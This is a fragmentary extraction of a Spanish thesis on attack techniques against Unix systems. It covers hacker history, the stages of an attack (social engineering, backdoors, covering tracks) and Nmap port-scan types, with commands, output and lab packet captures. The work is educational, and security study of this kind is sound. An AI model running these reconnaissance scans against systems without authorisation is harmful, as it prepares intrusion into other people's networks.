Documente Academic
Documente Profesional
Documente Cultură
Esta obra est licenciada bajo una Licencia Atribucin-No ComercialCompartir Obras Derivadas Igual 2.5 Argentina de Creative Commons.
Para ver una copia de esta licencia, visite http://creativecommons.org/licenses/bync-sa/2.5/ar/ o envenos una carta a Creative Commons, 171 Second Street, Suite
300, San Francisco, California, 94105, USA.
Marcelo Fernndez
Universidad Nacional de Lujn
Int. Ruta 5 y 7
6700 Lujn, Buenos Aires
Repblica Argentina
marcelo.fidel.fernandez@gmail.com
Resumen
El presente trabajo trata de brindar un panorama acerca de las tcnicas ms
comunes de obtencin de informacin remota en forma activa y pasiva, deteccin
de vulnerabilidades y posteriormente una introduccin al ataque en entornos tipo
Unix, como Linux (Debian, Ubuntu, Red Hat, Fedora, Suse, Mandriva, etc.), BSD
(FreeBSD, OpenBSD, NetBSD), Solaris, AIX, HP-UX, SCO Unix, etc.
En el Primer Captulo se hace una resea de la historia del Movimiento
Hacker, una comunidad nueva e interconectada, surgida al mismo tiempo que y
junto al desarrollo de la informtica misma. Luego se describen los diversos
factores tecnolgicos y circunstancias adicionales que alteraron su recorrido hasta
nuestros das, momento en que se podra decir que est en todo su esplendor.
Seguido de esto, se describe un poco la situacin global de la Seguridad
Informtica hoy en da, su relacin con la tica Hacker y la prctica del Hacking
tico como una forma de vida dentro de la Comunidad Hacker.
En el Tercer Captulo se plantean un conjunto de etapas como tpicas, o que
normalmente se llevan adelante, antes y despus de efectuar un ataque a la
seguridad informtica de una organizacin, con el fin de que tenga mayores
probabilidades de xito primero y maximizar las consecuencias luego.
Los captulos siguientes poseen una neta orientacin tcnica. El Cuarto
presenta la primera y ms extendida forma de recopilacin activa de informacin
remota: el escaneo de puertos o Port Scanning. Se introducen una serie de
variantes o tipos de escaneo, los cuales se encuentran en la herramienta ms
popular, Nmap, detallando el funcionamiento terico y prctico de cada una, ya
que se incluyen capturas del trfico de la red a modo de ejemplo.
El Captulo 5 explica otras formas de reconocimiento remoto, como ser la
deteccin de un Sistema Operativo en base a su pila de protocolos TCP/IP,
llamado OS Fingerprinting, en su versiones activa, pasiva y otras menos
utilizadas. Tambin se desarrollan algunas tcnicas an ms intrusivas, como la
Enumeracin de Servicios y el Fingerprinting de Aplicaciones.
El Sexto Captulo recorre algunas herramientas para aplicar y ampliar an
ms la teora de los dos captulos anteriores: Netcat; opciones avanzadas de Nmap
como su motor de scripting; port scanners alternativos como Unicornscan y
Scanrand, y un packet crafter como Hping es slo una muestra de las
posibilidades que tienen los intrusos (legales o no) frente a los sistemas
informticos.
II
Palabras Claves:
Seguridad, Linux, Unix, Seguridad de la Informacin, Hacking, Cracking,
Exploits, Fingerprinting, Port Scanning
III
Agradecimientos
Agradezco profundamente a toda la gente que me rode durante estos aos
de estudio: familia, docentes, amigos y compaeros con los que recorr el largo y
gratificante camino de estudiante universitario.
IV
ndice de Contenido
Resumen..........................................................................................................Pg. II
Agradecimientos............................................................................................Pg. IV
Prlogo...........................................................................................................Pg. IX
Captulo 1. Introduccin e Historia delos hackers..........................................Pg. 1
1.1. Los Programadores de Verdad..........................................................Pg. 1
1.2. Los dorados '60 -El comienzo de la cultura hacker.............................Pg. 2
1.3. Los aos '70 La Cultura de las PDP-10.............................................Pg. 5
1.4. Aparecen Unix y las minicomputadoras...............................................Pg. 6
1.5. Las microcomputadoras: Computadoras Personales..........................Pg. 11
1.6. Los aos '80, '90 y el FLOSS............................................................Pg. 11
Captulo 2. El Ataque de sistemas informticos............................................Pg. 14
2.1. El Negocio dela Seguridad en la Actualidad.....................................Pg. 14
2.2. El Hacking tico................................................................................Pg. 14
Captulo 3. Etapas Tpicas de un Ataque.......................................................Pg. 17
3.1. Planificacin y eleccin del objetivo..................................................Pg. 18
3.2. Obtencin de informacin..................................................................Pg. 18
3.2.1. Desde fuera de la organizacin...................................................Pg. 19
3.2.2. Desde dentro de la organizacin.................................................Pg. 20
3.2.3. Ingeniera Social.........................................................................Pg. 21
3.3. Bsqueda y rastreo de vulnerabilidades.............................................Pg. 22
3.3.1. Acceso Local..............................................................................Pg. 22
3.3.2. Acceso Remoto. Enumeracin de Servicios...............................Pg. 23
3.4. Buscando el Anonimato en la red.......................................................Pg. 26
3.4.1. Redes y Sistemas Annimos.......................................................Pg. 26
3.4.2. Utilizacin de Malware...............................................................Pg. 27
3.5. Ataque e Intrusin..............................................................................Pg. 28
3.5.1. Mapeo de Vulnerabilidades........................................................Pg. 28
3.5.2. Explotacin e intrusin...............................................................Pg. 30
3.6. Puertas traseras y Eliminacin de huellas..........................................Pg. 31
3.7. Atacar otro sistema.............................................................................Pg. 31
Captulo 4. Port Scanning..............................................................................Pg. 33
4.1. Mtodo de Funcionamiento y Objetivos............................................Pg. 33
4.2. Estados de un Puerto..........................................................................Pg. 34
V
VI
VII
VIII
Prlogo
Prlogo
Este trabajo surge como consecuencia del grn inters que tengo por la
seguridad informtica por un lado y la admiracin hacia la comunidad hacker por
el otro. Hoy en da, Internet permite que una gran masa de personas, entusiastas de
las nuevas tecnologas, vuelquen informacin e interacten con ella en forma
constante e ininterrumpida, gracias a los programas de software.
Pero lamentablemente, son pocos los que reflexionan que este nuevo medio
de comunicacin es diferente a los dems, para bien y para mal. Los errores de
programacin que antes slo provocaban problemas aqu y all en forma aislada,
cada vez necesitan de mayor cuidado, ya que su diseminacin crece en forma
global y exagerada; cada vez se escribe ms software, para ms consumidores, y
de forma ms integrada con la red.
Los esfuerzos por detener los problemas son cada vez ms difciles de
costear, sobrellevar y afrontar, y en consecuencia, hoy existe todo un gran
mercado global (lcito y del otro) alrededor de las vulnerabilidades en el manejo
de la informacin de esa gran masa.
Es por esto que creo que no es casual el enorme crecimiento del Software
Libre (FLOSS) en estos ltimos aos. Su fundamento en la filosofa hacker, su
defensa de los estndares abiertos, y la defensa de los derechos del usuario en el
manejo de la informacin est expandindose como alternativa, frente a un
modelo que como est quedando demostrado, tiene muchas fallas.
Este trabajo es un breve recorrido de los procedimientos ms comunes para
analizar primero y aprovecharse despus de estos errores, camino que los hackers
han sabido transitar y desarrollar en forma exclusiva, con el objetivo de fomentar
la inacabable cultura del conocimiento.
Aclaracin: Las tcnicas de ataque expuestos en este trabajo son slo una recopilacin a modo de
ejemplo y no pretenden ser completos. La informacin presentada como proveniente de
Organizaciones, Entidades y Empresas pueden o no contener datos verdicos o del mundo real, en
cuyo caso afirmativo ser aclarado oportunamente.
IX
computadoras
para
uso
militar
(ver Ilustracin 1).
Posteriormente,
la
UNIVAC I
lo que es hoy. Los hackers ejecutaron la Usenet. Los hackers hicieron la World
Wide Web funcionar. Si usted es parte de esta cultura, si usted contribuy a ella y
otras personas en ella saben quin es usted y lo llaman un hacker, entonces, usted
es un hacker. [ERBH]
Volviendo a esta poca dorada de los hackers [EBHL], hay que remarcar que
slo fue movilizada (y hasta posible) por notables cambios en la tecnologa de
la computacin. Como se dijo anteriormente, hasta ese momento las
computadoras eran utilizadas para ejecutar interminables procesos por lotes,
donde programarlas era bastante tedioso, ya que una mnima equivocacin en el
programa escrito (en un lenguaje de muy bajo nivel) haca que todo el
procedimiento fallara. Cuando apareci la TX-0 (la primera mquina
transistorizada, una de las primeras con una salida en forma de imagen[CM_TX0])
y las primeras computadoras PDP de DEC, todo cambi, ya que estas
computadoras proponan una operacin ms interactiva, que podan tocar
(tena una mquina de escribir elctrica adaptada para entrar datos a la mquina).
As y todo, la exigua cantidad de memoria y capacidad de procesamiento
con que contaban estas mquinas, haca que los programadores aplicaran todo su
ingenio para lograr mejores programas con muy pocos recursos disponibles. Es as
como nacieron los primeros hacks (no olvidemos que se buscaba recortar o
hachar el consumo de memoria y/o procesamiento) en los programas y luego,
el trmino hacker fue imponindose por decantacin.
Como estas primeras mquinas de cmputo, el movimiento e inters por
ellas se expandi y no slo tuvo su esplendor en el AILab del MIT, sino tambin
en la Universidad de Standford (SAIL6) y en la Carnegie-Mellon7, donde se
formaron ms centros de cultura hacker e investigacin.
Aos ms tarde, con la creacin de la red de comunicaciones ARPANet
(1969), estos centros de investigacin, originalmente divididos, comenzaron a
unificarse, a tener conciencia propia y funcionar como una comunidad, como
una tribu. Esto los fortaleci an ms y profundiz su alcance, logrando
avances tecnolgicos permanentemente.
El intercambio de informacin, el trabajo en conjunto entre laboratorios y
universidades hizo que todo el movimiento en s se potenciara en las siguientes
6 SAIL: Standford Artificial Intelligence Laboratory.
7 CMU: Carnegie-Mellon University.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 4 de 210
Es por esto que las PDP y sus hackers coparon la ARPANet; siendo la
cultura de la PDP-10 [PDP10-PRM][PDP10-Web] la ms relevante de esa poca (y en
menor medida las PDP-7 y PDP-8).
Es entonces donde los distintos (pero interconectados) ncleos de actividad
hacker y sus PDP-10 comenzaron a interesarse por diferentes lneas de
8 DEC: Digital Equipment Corporation
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 5 de 210
El AILab del MIT desarroll un sistema operativo alternativo para el PDP10 denominado ITS (Incompatible Timesharing System [WIKI_ITS]), a
diferencia del que integraba DEC (el TOPS-10 [WIKI_TOPS10]), y tena un
objetivo claro: desarrollar y utilizar dentro del laboratorio un sistema de
tiempo compartido propio, maximizando la eficiencia del hardware y los
usuarios[ITS_MIT]. Adems de hacer las cosas a su forma, este sistema
operativo permiti que los hackers del MIT desarrollaran una serie de
avances sin precedentes: el editor Emacs, el lenguaje LISP, y muchas
innovaciones revolucionarias en el ITS mismo, ms avanzado respecto de
otros Sistemas Operativos de aquel entonces, como Sistemas de archivos
remotos, manejo de procesos sofisticado, soporte de tiempo real , etc.
Todo este conocimiento terico y trabajo de aos fue llevado a
muchsimos sistemas, y permanece en uso hasta hoy en da; sin embargo,
el ITS en s estaba escrito en lenguaje de mquina (assembler) para la
PDP-10, y estaba atado a su destino.
ventana/cono/mouse. [SAIL_MUS]
En el CMU mientras tanto, se llevaron adelante los primeros sistemas
expertos y robots con destino industrial.
Tambin fueron importantes los avances logrados por los hackers del
PARC9[XPARCWEB]:
El mouse, la interfaz del software orientado a ventanas.
La impresora lser.
A esta altura (segunda mitad de la dcada del '70), la ARPANet era mucho
ms extensa que al comienzo, una universidades, centros de investigacin y
entidades estatales de EEUU; en trminos de hardware, era un conjunto de ms de
100 computadoras (111 en marzo de 1977, ver Ilustracin 4) [ARPA_TFI], la
mayora PDP-10 y PDP-11. Tena varias aplicaciones y protocolos estndar, como
Ilustracin 5: Arbol de las diferentes versiones de Unix a lo largo del tiempo [WIKI_LIN]. Ver
tambin otro rbol grfico an ms completo en [WIKI_UX]
Un buen ejemplo de esto se dio a fines de los '70, cuando DEC lanz la
arquitectura VAX, que se diseo como extensin y evolucin a 32 bits de la
anterior PDP-11. Thomas B. London y John F. Reiser escribieron un documento
al respecto[Unix32v] de donde la siguiente frase resume el trabajo de llevar Unix a
la VAX, llamado Unix/32V: Work on the C compiler began in mid-December
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 9 de 210
[WIKI_HCC]
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 11 de 210
a) LoshackersdelITSylasPDP-10.
b) Los hackers de Unix, el lenguaje C, y las PDP-11/VAX.
c) Los hackers de las computadoras personales.
15 Cabe resaltar que Stallman perteneca a la generacin de hackers del ITS y de las PDP-10.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 13 de 210
en 1984:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 14 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 15 de 210
You can create art and beauty on a computer: Usted puede crear arte y
belleza en una computadora.El programa ms corto debera ser admirado
por compaeros hackers[...] Hay definitivamente un impulso artstico
dentro de aquellos que pueden utilizar esta tcnica de genio-marciano, de
una calidad visionaria que los habilita a descartar el punto de vista actual y
sus
18 Eric Cole utiliza ataque pasivo y reconocimiento pasivo de forma indistinta y como
sinnimos. De hecho, le da la categora de ataque a algo que es meramente una bsqueda de
informacin, justificndolo tal como se transcribe.
19 Los ataques activos se utilizan para referenciar la seccin 1.3.3.
20 avenidas en dicha frase es una metfora de sistema/red propia de la organizacin.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 19 de 210
Llamadas telefnicas.
Mensajes de texto.
Visitas personales
formulario, o que le enve un fax con ciertos datos, etc. Las posibilidades y
situaciones son casi infinitas, y los estudios al respecto son alarmantes para toda
entidad preocupada por su seguridad [ISOC_STAT], donde se refleja lo sencillo que
es conseguir informacin ms o menos sensible de la mayora de los usuarios.
Para ejemplificar, un posible intruso, para conseguir acceso a la estacin de
trabajo de un empleado de una empresa, podra enviarle por correo tradicional a
su escritorio un pen drive, CD, etc. de regalo, de alguna empresa cliente, para que
lo vea. Luego, el empleado inserta el CD dentro de la computadora de su trabajo y
ejecuta la presentacin, que adems de mostrarle la salutacin para pasar
desapercibido, instala tambin un programa oculto que enva informacin del
equipo al atacante va internet, tomando el control de su equipo, y sirviendo de
puerta de entrada a toda (o parte al menos de) la red de la empresa.
cualquier otra precaucin puede ser vencida por un decidido atacante con posesin
fsica de una computadora. Configurar permisos de archivos, establecer
contraseas de acceso, y ocultando el ltimo nombre de usuario y contrasea
utilizados para iniciar la sesin son todos intentos loables, pero no van a frustrar a
un atacante experimentado.
As y todo, hay muchas historias y tcnicas sobre bsqueda activa de
debilidades de este tipo que se distribuyen por la red, como por ejemplo:
Dumpster
diving
[WIKI_DUMP]:
Consiste
en revolver la
basura
disimulado.
Shoulder Surfing [WIKI_SSF]: Alguien entrenado a husmear las contraseas
de los dems mientras las tipean.
Piggybacking [WIKI_PIG]: Consiste en hacerse pasar por alguien autorizado
para sortear un puesto de seguridad, como puede ser la entrada a un
edificio.
Aplicaciones:
Aplicaciones Web: CMSs (Content Management Systems),
Issue
Tracking,
Aplicaciones que manejan el correo entrante y saliente: Software AntiSpam y Anti-Virus.
Si la meta del atacante en esta etapa es tener una radiografa del sistema
objetivo, el medio para generarla es realizar una deteccin de los puertos
abiertos24 en primera instancia, y luego determinar la versin especfica (o al
menos aproximada) del software que est detrs, en lo que se conoce como
enumeracin.
Como puede deducirse al ver el listado, as como la cantidad de
posibilidades es realmente enorme, existe una cantidad igual de grande de
programas desarrollados en pos de obtener informacin remota; con el
tiempo, un cracker experimentado puede hacerse de un toolkit25 importante y
diverso de software para obtener informacin y verificar debilidades en los
sistemas.
An as, se puede considerar a Nmap como el ms utilizado ya que es el
24 Un puerto (en el protocolo TCP) es un nmero que representa una conexin con la capa de red
IP del Sistema Operativo. Puede tener varios estados, y el estado abierto significa que hay un
programa asociado al mismo que est escuchando por peticiones de otros programas en la red,
usualmente para devolverle algn resultado
25 Toolkit: Conjunto o Caja de herramientas.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 24 de 210
Como puede verse, realizan todos los pasos tpicos de un test de penetracin
ntegro. Estas herramientas tienen muchsima utilidad para los administradores de
sistemas y redes grandes, ya que entre sus ventajas se cuentan:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 28 de 210
33 La palabra mapeo es una castellanizacin del ingls map, que significa trazar en un mapa.
Se utiliza mucho para hacer referencia a la traza de puntos, ideas, relacionar una cosa con otra.
34 Ver Glosario: Honeypot, pg. 193.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 29 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 31 de 210
protocolos planos sin TLS40/SSL41, etc.); las redes conmutadas (unidas por
switches) no son un problema si se utilizan tcnicas de ARP42 Spoofing43 o
similares.
Instalar software que se aproveche del uso del equipo, como por ejemplo
un keylogger por software.
Ser preciso. Para evitar los falsos positivos y detectar puertos realmente
abiertos.
Paquete Nro: 1
Tiempo: 0.000000
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2
Tiempo: 0.001187
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3
Tiempo: 0.035640
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 4
Tiempo: 0.036224
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 5
Tiempo: 0.036243
Origen: 192.168.0.2:58071 -> Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 58071 > 22 [SYN] Seq=0 Len=0 MSS=1460
Paquete Nro: 6
Tiempo: 0.039220
Origen: 192.168.0.30:22 -> Destino: 192.168.0.2:58071
Protocolo: TCP
Descripcin: 22 > 58071 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460
Paquete Nro: 7
Tiempo: 0.039266
Origen: 192.168.0.2:58071 -> Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 58071 > 22 [RST] Seq=1 Len=0
Paquete Nro: 5
Tiempo: 0.070008
Origen: 192.168.0.2:61609 -> Destino: 192.168.0.30:80
Protocolo: TCP
Descripcin: 61609 > 80 [SYN] Seq=0 Len=0 MSS=1460
Paquete Nro: 6
Tiempo: 0.070331
Origen: 192.168.0.30:80 -> Destino: 192.168.0.2:61609
Protocolo: TCP
Descripcin: 80 > 61609 [RST, ACK] Seq=0 Ack=1 Win=0 Len=0
Hay que recordar que los port scanners suelen no respetar los protocolos y
procedimientos estndar, tanto de capas inferiores como superiores, y aqu hay
una prueba de ello.
55 Hay que destacar que lo que se muestra aqu como captura de trfico es una interpretacin de la
misma hecha con algunas herramientas de las cuales se dispone, ocultando detalles para reducir
la complejidad y extensin innecesaria del documento. Es por eso que aqu no se aprecia el
byte 0x03 dentro del encabezado ICMP que indica esto. Ver el Anexo B.
56 Ver Glosario: DNS, pg. 192.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 38 de 210
Paquete Nro: 1
Tiempo: 0.000000
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2
Tiempo: 0.000283
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3
Tiempo: 0.040598
Origen: 192.168.0.2:37555 -> Destino: 192.168.0.30:80
Protocolo: TCP
Descripcin: 37555 > 80 [SYN] Seq=0 Len=0 MSS=1460
Paquete Nro: 4
Tiempo: 0.153698
Origen: 192.168.0.2:37556 -> Destino: 192.168.0.30:80
Protocolo: TCP
Descripcin: 37556 > 80 [SYN] Seq=0 Len=0 MSS=1460
resultado del objetivo un tiempo aproximado de 400 ms. Sabiendo el RTT, est
claro que el nivel de confianza en el resultado (el puerto est siendo
filtrado) es muy alto. El tiempo total del test dur unos 0.5 segundos (500
milisegundos).
Si bien este ejemplo es sencillo porque se posee un valor de RTT bastante
confiable resultado de una peticin ARP, en el caso de los escaneos a objetivos
fuera de una LAN el problema de saber cunto esperar se complica, ya que hay
seguramente varios nodos intermedios, trfico de terceros, y la posibilidad de
establecer un RTT nico y constante es casi imposible. Diferentes port scanners61
toman diferentes criterios para tratar de solucionarlo, y todo buen hacker debe
conocer estos detalles, ya que un falso positivo o un negativo errneo puede
dificultar la tarea de obtencin de grietas en la seguridad de la red a penetrar.
Por ltimo, hay que resaltar que dependiendo de las herramientas que se
utilicen, en un escaneo de puertos UDP slo se puede aseverar que un puerto
UDP est cerrado; es decir, si no est cerrado, puede estar abierto o filtrado.
En el caso de que no se reciba un paquete ICMP Destination Unreachable, para
determinar que un puerto UDP est abierto, hay que saber de antemano qu
servicio est escuchando en dicho puerto y hablar su protocolo. Es cierto que
hay un juego de probabilidades (por ejemplo, en el puerto 53 es realmente raro
que haya algo diferente a un servidor DNS) en donde se defina un conjunto de
puertos UDP comunes para hacer pruebas, pero an as, esta capacidad de
implementar protocolos de capas superiores a la 4 escapa usualmente a los port
scanners dada su complejidad. Aqu reside otra razn por la cual los escaneos
TCP son generalmente ms tenidos en cuenta.
4.3.1. SynScan
El Syn Scan es el tipo de scanning TCP ms utilizado, ya que permite
obtener de manera rpida y bastante silenciosa una idea del estado de los
puertos TCP en el destino. Consiste en enviar un paquete de inicio de conexin
TCP (con el flag SYN activado), a espera de una respuesta del destino. Si la
respuesta es un paquete SYN+ACK, el puerto est abierto. Si la respuesta es un
RST o RST+ACK, el puerto est cerrado. Si no hay respuesta o se recibe un
ICMP Unreachable, Nmap identifica el puerto como filtrado (si es el primer caso,
se dice que los paquetes que enva el port scanner son dropeados62).
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sS -p 22 192.168.0.30
Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-23 14:50 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.381 seconds
marcelo@saturno:~/src/nmap/bin$
69 Sudo es un programa que permite dar acceso a un usuario o un grupo Unix permisos para
ejecutar un comando como usuario root. URL: http://www.sudo.ws/
70 El Connect Scan es el que Nmap ejecuta por defecto para los usuarios no root. An como
usuario root, el parmetro -sT permite forzar este tipo de scanning.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 43 de 210
4.3.3. AckScan
El ACK Scan hace que el objetivo enve como respuesta un paquete con el
flag RST por cada puerto, independientemente de que est abierto o cerrado. Si no
71 Banner (Titular). Es una prctica comn de la mayora de los protocolos enviar un mensaje
de anuncio al cliente que se conecta. Este mensaje se llama Banner en la jerga.
72 El protocolo SSH versin 2 es un estndar abierto y est detallado en varios RFCs. La mayor
parte de su arquitectura y componentes se especifican en los RFC 4250 al 4256.
URLs: http://tools.ietf.org/html/rfc4251, http://www.openssh.com/manual.html
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 44 de 210
Paquete Nro: 1
Tiempo: 0.000000
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2
Tiempo: 0.000269
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3
Tiempo: 0.031898
Origen: 192.168.0.2:34490 -> Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 34490 > 22 [ACK] Seq=0 Ack=0 Win=1024 Len=0
Paquete Nro: 4
Tiempo: 0.032162
Origen: 192.168.0.30:22 -> Destino: 192.168.0.2:34490
Protocolo: TCP
Descripcin: 22 > 34490 [RST] Seq=0 Len=0
Paquete Nro: 5
Tiempo: 0.032321
Origen: 192.168.0.2:34490 -> Destino: 192.168.0.30:80
Protocolo: TCP
Descripcin: 34490 > 80 [ACK] Seq=0 Ack=0 Win=2048 Len=0
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 45 de 210
Paquete Nro: 6
Tiempo: 0.032396
Origen: 192.168.0.30:80 -> Destino: 192.168.0.2:34490
Protocolo: TCP
Descripcin: 80 > 34490 [RST] Seq=0 Len=0
Paquete Nro: 1
Tiempo: 0.000000
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2
Tiempo: 0.000697
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3
Tiempo: 0.036039
Origen: 192.168.0.2:35837 -> Destino: 192.168.0.30:8080
Protocolo: TCP
Descripcin: 35837 > 8080 [ACK] Seq=0 Ack=0 Win=4096 Len=0
Paquete Nro: 4
Tiempo: 0.142627
Origen: 192.168.0.2:35838 -> Destino: 192.168.0.30:8080
Protocolo: TCP
Descripcin: 35838 > 8080 [ACK] Seq=0 Ack=0 Win=1024 Len=0
4.3.5. UDPScan
El escaneo UDP se encarga de verificar el estado de los puertos UDP del
destino. La dificultad extra (teniendo en cuenta la obtencin de resultados
tiles) que plantea el protocolo UDP es su falta de estado, ya que est orientado a
datagramas74, sin la complejidad del esquema basado en conexiones de TCP. Otra
desventaja es que al no tener diferentes estos estados de conexin (ya que como
se dijo, no hay conexiones), el test que hace el port scanner es directamente
enviado a la aplicacin por el Sistema Operativo (si el puerto est abierto), lo que
hace al test evidentemente ms detectable para el objetivo que algunos escaneos
de tipo TCP.
Debido a lo anterior, Nmap produce usualmente dos resultados: puerto
cerrado o open|filtered (abierto o filtrado). El primero corresponde a que se
recibi un paquete ICMP de tipo Destination Unreachable/Port Unreachable
(ICMP tipo 3, cdigo 3); el segundo a que no se recibi respuesta, cosa que
73 An as, a pesar de haberse realizado varias pruebas con diferentes SOs actuales y no tanto, no
se ha podido obtener diferencia substancial alguna con respecto al ACK Scan: todos los
tamaos de ventana de los RST (de puertos abiertos y cerrados) son 0. Es por eso que este
escaneo no es tan frecuente, y puede que tenga mayor valor en arquitecturas o redes legacy.
74 En general, se considera como datagrama un paquete correspondiente a un servicio no fiable,
como UDP o mismo IP.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 47 de 210
sucede con la mayora de los servicios que utilizan UDP, ya que Nmap enva un
probe UDP pero vaco75,76.
Adems estos resultados, en ocasiones puede recibirse un ICMP tipo 3
(Destination Unreachable), pero cdigo 1, 2, 9, 10 o 13, en cuyos casos, Nmap
informa que el puerto est filtrado (solamente). Esto es as porque justamente
estos paquetes ICMP reportan un problema con el destino o una prohibicin a
nivel administrativo.
Por ltimo, si algn servicio que est escuchando en el puerto UDP que est
siendo escaneado, retorna alguna respuesta al estmulo del datagrama vaco
enviado por Nmap, ste lo marca como abierto.
Estos dos ltimos casos no son tan comunes, ya que en las redes de hoy en
da estos paquetes ICMP no son utilizados por routers/firewalls (los datagramas
simplemente se dropean), o por otra parte no hay muchos servicios que
respondan a un mensaje vaco, respectivamente.
brevedad slo se muestra aqu una nica captura (la Nro. 8); el resto (Nros. 9 a 11)
estn disponibles en el Anexo B).
En las capturas de trfico puede verse que justamente, salvo para el puerto
abierto 22 (donde no hay respuesta alguna), la respuesta del host 192.168.0.30 es
un RST+ACK.
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sN 192.168.0.30 -p
22,25,80
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:42 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE
SERVICE
22/tcp open|filtered ssh
25/tcp closed
smtp
80/tcp closed
http
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.541 seconds
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sM 192.168.0.30 -p
22,25,80
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:43 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE SERVICE
22/tcp closed ssh
25/tcp closed smtp
80/tcp closed http
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.393 seconds
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sX 192.168.0.30 -p 20-22
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:44 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE
SERVICE
20/tcp closed
ftp-data
21/tcp closed
ftp
22/tcp open|filtered ssh
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.677 seconds
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sF 192.168.0.30 -p
22,110,8080
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:45 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE
SERVICE
22/tcp
open|filtered ssh
110/tcp closed
pop3
8080/tcp closed
http-proxy
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.543 seconds
marcelo@saturno:~/src/nmap/bin$
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 50 de 210
Paquete Nro: 1
Tiempo: 0.000000
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2
Tiempo: 0.000431
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3
Tiempo: 0.032196
Origen: 192.168.0.2:54999 -> Destino: 192.168.0.30:25
Protocolo: TCP
Descripcin: 54999 > 25 [] Seq=0 Len=0
Paquete Nro: 4
Tiempo: 0.032437
Origen: 192.168.0.30:25 -> Destino: 192.168.0.2:54999
Protocolo: TCP
Descripcin: 25 > 54999 [RST, ACK] Seq=0 Ack=0 Win=0 Len=0
Paquete Nro: 5
Tiempo: 0.032518
Origen: 192.168.0.2:54999 -> Destino: 192.168.0.30:80
Protocolo: TCP
Descripcin: 54999 > 80 [] Seq=0 Len=0
Paquete Nro: 6
